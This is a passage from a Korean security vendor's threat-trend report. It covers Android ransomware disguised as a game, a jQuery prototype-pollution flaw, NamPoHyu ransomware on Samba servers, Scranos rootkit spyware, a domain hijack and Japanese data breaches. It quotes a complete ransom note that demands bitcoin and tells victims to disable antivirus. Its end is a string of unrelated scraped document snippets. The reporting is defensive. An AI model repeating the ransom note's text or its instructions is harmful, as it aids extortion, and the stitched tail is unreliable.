52 03 악성코드분석보고 [ 그림 10] 복호화이후기기상태확인 2.10 지속적인악성앱실행 기기가재실행되면악성앱을재시작한다. [ 그림 11] 부팅완료시악성앱재실행 50

53 03 악성코드분석보고 2.11 C&C 접속불가 C&C 를통해서키값을받아온후암호화를했기때문에, 현재 C&C 와접속이불가하여감염되면키값을찾을방법이 없어복호화가불가능하다. [ 그림 1] 현재접속불가한 C&C 서버 51

54 03 악성코드분석보고 3. 결론 해당악성앱은유명게임앱으로위장하여사용자를속인다. 감염되면자기자신을숨기며, 기기외부저장소의모든 파일과연락처를암호화한다. 또한, 암호화된파일에대한복호화비용을지불하지않으면기기의사용도불가하다. 특히, C&C 서버를통해서암호화키값을받아오는데현재 C&C 서버와연결이되지않아서감염이되고난이후라면 복호화할수있는방법이없어사용자들은매우주의해야한다. 52

55 이스트시큐리티보안동향보고서 04 글로벌보안동향 53

56 04 글로벌보안동향 jquery 자바스크립트라이브러리에서웹사이트취약점발견 jquery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites 인기있는 jquery 자바스크립트라이브러리에서공격자가자바스크립트오브젝트의프로토타입을변조하도록허용할수있는프로토타입오염 (Prototype pollution) 결함이발견되었다. jquery 자바스크립트라이브러리는현재온라인전체웹사이트중 74% 에사용되고있으며, 사이트대부분이 프로토타입오염 결점에취약한라이브러리 1.x 와 2.x 버전을사용하고있었다. 해당라이브러리는금주이문제를수정하기위한보안패치를발표했다. 이는해당코드에서주요보안취약점이 발견된지 3 년만이다. 자바스크립트오브젝트는선정이된구조를기반으로다수값을저장하는데사용될수있는변수와같다. 프로토타입은 자바스크립트오브젝트의기본구조및기본값을정의하는데사용되며, 값이설정되지않았을경우예상구조를 지정하는데필수적이다. 자바스크립트오브젝트프로토타입을변조할수있는공격자는어플리케이션을충돌시키고예상된값을받지못할 경우행동을변경시킬수있게된다. 자바스크립트의사용현황을감안할때, 프로토타입오염결함악용은웹 어플리케이션에심각한영향을미칠것으로예상된다. jquery 라이브러리에존재하는이취약점 (CVE ) 은 Snyk 의연구원들이발견했으며, 프로토타입오염공격의 PoC 코드까지공개했다. 이보안취약점은프로토타입오염을나타내며, 공격자들이자바스크립트어플리케이션오브젝트프로토타입에덮어쓰기하도록허용한다. 이같은일이발생할경우, 공격자제어속성이오브젝트에주입되며, 자바스크립트예외를트리거해서비스거부를유발하거나공격자가삽입하는코드경로를강제로적용하도록어플리케이션소스코드를변조할수있게된다. 전문가들은공격자들이이취약점을악용할경우 jquery 라이브러리코드를사용하는웹앱에서관리자권한을 부여받을수있다는것을시연해보였다. 전문가에따르면, 다행히도이프로토타입오염문제는대규모공격에서악용이불가능한것으로나타났다. 익스플로잇 코드가타깃에따라다르게작성되어야하기때문이다. 어플리케이션에 jquery 자바스크립트라이브러리를사용하는웹개발자들은최신버전인 jquery 으로 업데이트하기를권고한다. 54

57 04 글로벌보안동향 jquery 팀은블로그를통해 jquery 은 jquery.extend (true, {}, ) 를사용할때발생하는의도하지않은행동들에대한수정사항을포함하고있다. 검사하지않은소스오브젝트가열거가능한 proto 속성을포함하고있을경우, 이는기존의 Object.prototype 을확장시킬수있다. 이수정사항은 jquery 에포함되어있으나, 이전 jquery 버전을패치하기위한 patch diff 도있다고밝혔다. [ 출처 ] 55

58 04 글로벌보안동향 원격 Samba 서버를노리는 NamPoHyu 바이러스랜섬웨어발견 'NamPoHyu Virus' Ransomware Targets Remote Samba Servers NamPoHyu Virus, MegaLocker Virus 라불리는새로운랜섬웨어패밀리가발견되었다. 이랜섬웨어는다른랜섬웨어들과는조금다른방법으로타깃을노린다. 공격자는랜섬웨어를로컬에서실행하여접근가능한 Samba 서버를원격으로암호화한다. 보통랜섬웨어감염은다른악성코드또는악성이메일첨부파일을통하거나, 공격자가컴퓨터나네트워크를해킹하여 암호화될컴퓨터에서발생한다. 하지만이새로운랜섬웨어는접근가능한 Samba 서버를찾아패스워드를 브루트포싱한후원격으로파일을암호화하고랜섬노트를생성한다. Shodan 검색결과, 50 만대에가까운 Samba 서버가이랜섬웨어의타깃이될가능성이있는것으로보인다. [ 출처 ] 다행히도암호화된파일을복호화할수있는방법이발견되었으며, emsisoft.com 에서확인할수있다. 56

59 04 글로벌보안동향 2019 년 3 월처음발견된 MegaLocker 2019 년 3 월, NAS 스토리지기기가 MegaLocker Virus 라는랜섬웨어에의해암호화되었다. 이랜섬웨어는.crypted 확장자를사용했으며,!DECRYPT_INSTRUCTION.TXT 라는랜섬노트를생성했다. 이랜섬노트는 alexshkipper@mail.ru 주소로생일, 휴가, 취미등기타개인이벤트와함께피해자의사진을첨부하여 이메일을보내라는내용을포함하고있었다. 피해자가개인으로증명될경우랜섬머니는 $250, 기업일경우 $1,000 으로책정되는것으로나타났다. [ 출처 ] FTP 를통해감염된것으로추측된다는제보가있었으나, 대부분은 NAS 기기가감염되었기때문에 Samba 를통해 암호화가이루어진다고추측하고있다. 4 월부터 NamPoHyu 라는이름으로변경돼 2019 년 4 월초, 피해자들은해당랜섬웨어가 NamPoHyu 로이름을변경하고암호화된파일에.NamPoHyu 확장자를 붙이기시작했다. 새버전의랜섬노트는이전과파일명은동일하며, Tor 지불사이트로랜섬머니를지불할것을안내했다. 57

60 04 글로벌보안동향 What happened to your files? All of your files were protected by a strong encryption with AES cbc-128 using NamPoHyu Virus. What does this mean? This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them. The encryption key and ID are unique to your computer, so you are guaranteed to be able to return your files. Your unique id: [id] What do I do? You can buy decryption for 1000$. But before you pay, you can make sure that we can really decrypt any of your files. To do this: 1) Download and install Tor Browser ( ) 2) Open the web page in the Tor Browser and follow the instructions. FAQ: How much time do I have to pay for decryption? You have 10 days to pay for the ransom after decrypting the test files. The number of bitcoins for payment is fixed at the rate at the time of decryption of test files. Keep in mind that some exchangers delay payment for 1-3 days! Also keep in mind that Bitcoin is a very volatile currency, its rate can be both stable and change very quickly. Therefore, we recommend that you make payment within a few hours. 58

61 04 글로벌보안동향 How to contact you? We do not support any contact. What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, since we are not barbarians and moreover it will harm our business. How do I pay the ransom? After decrypting the test files, you will see the amount of payment in bitcoins and a bitcoin wallet for payment. Depending on your location, you can pay the ransom in different ways. Use Google to find i nformation on how to buy bitcoins in your country or use the help of more experienced friends. Here are some links: - payment by bank card How can I decrypt my files? After confirmation of payment (it usually takes 8 hours, maximum 24 hours) you will see on this page ( ) a link to download the decryptor and your aes-key (for this, simply re-enter (refresh) this page a day after payment) Download the program and run it. Attention! Disable all anti-virus programs, they can block the work of the decoder! Copy aes-key to the appropriate field and select the folder to decrypt. The program will scan and decrypt all encrypted files in the selected folder and its subfolders. We recommend that you first create a test folder and copy several encrypted files into it to verify the decryption. 59

62 04 글로벌보안동향 About Bitcoins: About Tor Browser: <NamPoHyu Virus 랜섬노트 > 해당 Tor 사이트에는지불관련정보를얻기위해랜섬노트에표기된 ID 와함께 로이메일을 보내라는내용을확인할수있다. 랜섬머니는개인 $250, 기업 $1,000 상당의비트코인으로이전버전과동일한금액이다. [ 출처 ] Scranos: 빠르게진화하는루트킷지원스파이웨어발견 60

63 04 글로벌보안동향 Scranos: New Rapidly Evolving Rootkit-Enabled Spyware Discovered 루트킷을지원하는새로운강력한스파이웨어가발견되었다. 해커들은영상플레이어, 드라이버, 안티바이러스제품과 같은합법적인소프트웨어로위장한해적판프로그램에트로이목마를삽입하여배포했다. Scranos 로명명된이루트킷악성코드는작년처음발견되었으며, 아직까지개발중인것으로확인된다. 이악성코드는 지속해서진화하고있으며, 새로운컴포넌트를테스트하고이전컴포넌트를정기적으로개선하고있어더욱심각한 위협될것으로우려된다. Scranos 는로그인크리덴셜및다양한서비스의지불계정탈취, 브라우징히스토리및쿠키추출, 유튜브구독자생성, 광고표시, 페이로드다운로드및실행등의기능을가지고있다. 비트디펜더가공개한보고서에따르면, 이악성코드는감염된기기에디지털서명된루트킷드라이버를설치해 지속성을얻는다. 연구원들은공격자들이 Yun Yu Health Management Consulting (Shanghai) Co., Ltd 에발행된유효한디지털인증서를 부적절하게이용한것으로추측했다. 해당인증서는폐지되지않은상태이다. 이루트킷은 Shutdown 콜백을등록하고셧다운시, 해당드라이버는디스크에기록되며시작서비스키가 Registry 에 생성된다. 이루트킷악성코드에감염되면, 정식프로세스에다운로더를주입하고공격자가제어하는 C&C 서버와통신하게된다. 그리고하나또는그이상의페이로드를다운로드한다. 아래는데이터및패스워드탈취페이로드를나열한것이다. 패스워드및브라우징히스토리탈취페이로드 메인드로퍼가구글크롬, 크로미움, 모질라파이어폭스, 오페라, 마이크로소프트엣지, 인터넷익스플로러, 바이두브라우저및얀덱스로부터브라우저쿠키, 로그인크리덴셜을훔친다. 또한사용자의페이스북, 유튜브, 아마존, 에어비앤비계정으로부터쿠키및로그인정보를탈취할수있다. 확장프로그램인스톨러페이로드 이페이로드는크롬에애드웨어확장프로그램을설치하고사용자가방문하는모든 웹사이트에악성광고를표시한다. 일부샘플은 Chrome Filter, Fierce-tips, PDF Maker 와같은가짜브라우저확장 프로그램을설치한다. 스팀데이터탈취페이로드 이컴포넌트는피해자의스팀계정크리덴셜및정보를탈취해공격자의서버로전송한다. 설치된앱및게임, 하드코딩된버전등의정보를포함한다. 61

64 04 글로벌보안동향 피해자의계정으로페이스북과유튜브사용해 일부페이로드는피해자의계정으로여러웹사이트를사용할수도있다. 유튜버구독자페이로드 이페이로드는크롬을디버깅모드로실행해유튜브페이지를조작한다. 브라우저에영상을 시작하고, 음소거, 채널구독, 광고클릭등과같은행동을지시할수있다. [ 출처 ] 페이스북스패머페이로드 수집한쿠키와기타토큰을활용해공격자들은악성코드가다른사람들에게페이스북친구 신청을보내도록지시할수있다. 또한피해자의페이스북친구들에게악성안드로이드 APK 가포함된메시지를보낼 수있다. 안드로이드애드웨어앱 공식구글플레이스토어에서찾아볼수있는정식 Accurate scanning of QR code" 앱으로 위장한이악성코드는공격적으로광고를표시하며, 감염된피해자들을추적하고윈도우악성코드와동일한 C&C 서버를사용한다. 인기있는웹사이트로부터지불정보탈취 메인드롭퍼에포함된 DLL 의목록은아래와같다. 페이스북 DLL 지불정보, 친구목록, 관리하는페이지등사용자의페이스북계정과관련된정보를추출한다. 아마존 DLL 사용자의아마존계정에서정보를추출한다. 이 DLL 의특정버전은로그인된에어비앤비계정으로부터 정보를추출하도록설계되었다. 62

65 04 글로벌보안동향 Scranos 는주로인도, 루마니아, 브라질, 프랑스, 이탈리아, 인도네시아에서많이발견되었다. 이악성코드의가장 오래된샘플은 2018 년 11 월발견되었으며, 지난 12 월과 1 월엄청나게증가했지만 2019 년 3 월부터다른종류의 악성코드를전달했다. [ 출처 ] 러브라이브는우리가접수했다! 인기애니메이션도메인탈취 ラブライブは我々が頂いた! - 人気アニメ公式サイトでドメイン乗っ取りか 63

66 04 글로벌보안동향 인기애니메이션작품 ' 러브라이브! 시리즈의공식사이트가본래와는다른표시가나타나사용자들이혼란에빠졌다. 공식 Twitter 에서는원인에대해서조사중이라고공지하였으며, 사용자들의접속주의를당부하고있다. "LoveLive_staff" Twitter 공식계정에는아래와같은안내문을기재했다. 현재 러브라이브 시리즈공식사이트에서페이지내용을조작당해문제가보고되고있습니다. 현재 원인규명중이지만홈페이지방문자에게악의적인시도가이루어질가능성이있으므로, 접속을피하길 부탁드리겠습니다. 이사이트에접속하면, 러브라이브는우리가접수했다! 등범행성명이라할수있는메시지가표시된다. 또한 이관오퍼를하여전소유자가이관오퍼를승인했다 등으로설명하고있다. 이사이트의도메인 loveliveanime.jp 에대해서 Whois 정보를확인해보면 4 월 5 일업데이트되었으며, 소유자가기존의선라이즈에서 우에노카호 ( 上野かほ ) 라는인물로변경되어있다. 공식 Twitter 에서는이번문제에대해서원인을조사중이라고전했으며, 악의있는콘텐츠가표시되어열람자에게 영향을미칠우려도있다며접속을피해달라고요청하고있다. 또한, 향후대응에대해서는 Twitter 로안내하겠다고 전했다. [ 출처 ] 만건의개인정보가유출된 ' 타쿠파일빈 ', 패스워드확인및회원탈퇴신청할수있는특설사이트개설 481 万件の個人情報が漏えいした 宅ふぁいる便 パスワードの確認や退会申し込みができる特設サイトを開設 64

67 04 글로벌보안동향 파일전송서비스 타쿠파일빈 이악의적인부정접속으로약 481 만건의개인정보가유출되었다. 이사건으로해당 서비스운영회사인주식회사오지스종합연구소는 4 월 8 일, 유출된패스워드등을확인할수있는 타쿠파일빈 Web 특설사이트 를개설했다. 타쿠파일빈에서유출된정보는사용자의성명 / 생년월일등을포함하는개인정보와로그인 ID, 패스워드등이포함되어 있다. 오지스종합연구소측의발표에따르면, 로그인패스워드는암호화되어있지않으며, 4 만 2051 건의탈퇴자 정보도포함되어있다고밝혔다. 타쿠파일빈은 1 월 23 일에서비스를정지했다. 유출된정보를확인할수있는서비스제공시간은 9 시 ~17 시 45 분이다. 확인방법은등록된 ID( 메일주소 ) 를작성하고, 도착한인증코드를사용하여로그인한다. 그리고타쿠파일빈에등록되어있는패스워드를확인할수있다. 또한 회원탈퇴신청, 타쿠파일빈포인트교환기능이이용가능하다. 이서비스는타쿠파일빈의보유데이터에서최소한의항목을추출하고암호화등의보안처리를실시하여타쿠파일빈 시스템과는완전히분리된전혀다른환경 / 서비스상에별도시스템으로새롭게개발및구축한뒤에사용자에게 제공하고있다. [ 출처 ] 통판사이트 나나쓰호시 Gallery, 시큐리티코드포함한최대 3,086 건카드정보유출 (JR 규슈 ) 通販サイト ななつ星 Gallery に不正アクセス セキュリティコード含む最大 3,086 件カード情報流出 (JR 九州 ) 65

68 04 글로벌보안동향 4 월 12 일, 규슈 ( 九州 ) 여객철도주식회사는이회사가운영하는 나나쓰호시 in 규슈 관련상품을판매하는 나나쓰호시 Gallery ( 에서외부부정접속으로고객카드정보를포함한 개인정보의유출이발견되었다고발표했다 년 3 월 11 일오후 3 시경에결제대행회사에서 나나쓰호시 Gallery 사이트에서이용된신용카드정보가 유출된것같다는연락을받아알려지게되었다. 이회사에서는사이트유지보수관리를위탁하고있는시스템회사에 의뢰하여 11 일내로사이트를폐쇄했으며, 제 3 의조사기관인 P.C.F. FRONTEO 주식회사 에조사를의뢰했다. 3 월 28 일에제출된조사보고서에따르면, 외부해커가사이트의취약점을노리고악의적으로접속하였으며, 이 사이트를이용한모든고객의신용카드정보가유출된기록이확인되었다고전했다. 더불어이사이트에등록된기타 개인정보도유출되었을가능성이높다는사실도판명되었다. 유출가능성이있는정보는 2013 년 10 월 5 일 ( 사이트개설일 ) 부터 2019 년 3 월 11 일 ( 사이트폐쇄일 ) 까지사이트를이용한고객의개인정보로최대 7,996 명에이른다. 그리고크루즈트레인 나나쓰호시 in 규슈 차내에서고객이이용한신용카드는다른시스템을이용하고있기때문에유출사실이확인되지않고있다. 유출된개인정보는아래와같다. 1. 회원등록한고객 ( 카드정보등록존재 ): 최대 3,086 건 (2,816 명 ) - 카드번호, 유효기간, 보안코드유출 - 성명, 주소, 우편번호, 전화번호, FAX 번호, 성별, 생년월일, 메일주소, 직업, 암호화된패스워드, 암호화된비밀번호질의답유출가능성높음. 2. 회원등록한고객 ( 카드정보등록없음 ): 최대 3,148 명 - 성명, 주소, 우편번호, 전화번호, FAX 번호, 성별, 생년월일, 메일주소, 직업, 암호화된패스워드, 암호화된비밀번호 질의답유출가능성높음. 3. 해외고객 : 최대 36 명 - 성명, 주소, 우편번호, 전화번호, 메일주소유출가능성높음. 4. 나나쓰호시 in 규슈 에승차하여후일배송으로배송한정품을구입한고객 : 최대 1,288 명 성명, 주소, 우편번호, 전화번호유출가능성높음. 5. 회원등록한고객및 나나쓰호시 in 규슈 에승차한고객이배송한정품을배송지로지정한고객 : 최대 708 명 - 성명, 주소, 우편번호, 전화번호, FAX 번호유출가능성높음. 66

69 04 글로벌보안동향 이회사에서는 3 월 28 일에개인정보보호위원회, 규슈운수국, 후쿠오카현경찰본부에해당사건을보고하고결제대행 회사, 카드회사에도보고서의내용을공유했다. 회사측은 4 월 12 일부터개인정보가유출되었을가능성이있는고객에대해메일및우편으로사죄와경위에대해서서면으로송부했다. 또한카드회사와연계하여유출가능성이있는카드의거래모니터링을강화해부정이용방지에힘쓰고있다. 회사측은조사결과를바탕으로시스템보안대책과감시체제를강화하고재발방지구축과개인정보보호체제를정비할것이라고밝혔다. [ 출처 ] 67

70 ( 주 ) 이스트시큐리티 ( 우 ) 서울시서초구반포대로 3 이스트빌딩

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.

More information

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응 MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.

More information

System Recovery 사용자 매뉴얼

System Recovery 사용자 매뉴얼 Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

Chapter 1

Chapter 1 3 Oracle 설치 Objectives Download Oracle 11g Release 2 Install Oracle 11g Release 2 Download Oracle SQL Developer 4.0.3 Install Oracle SQL Developer 4.0.3 Create a database connection 2 Download Oracle 11g

More information

Install stm32cubemx and st-link utility

Install stm32cubemx and st-link utility STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro

More information

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대 Non-ActiveX 방식의 메일암호화 솔루션 1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대응 및 운영 비용이 증가하는 원인이 되어 개선이

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하 Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정

More information

SBR-100S User Manual

SBR-100S User Manual ( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S

More information

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

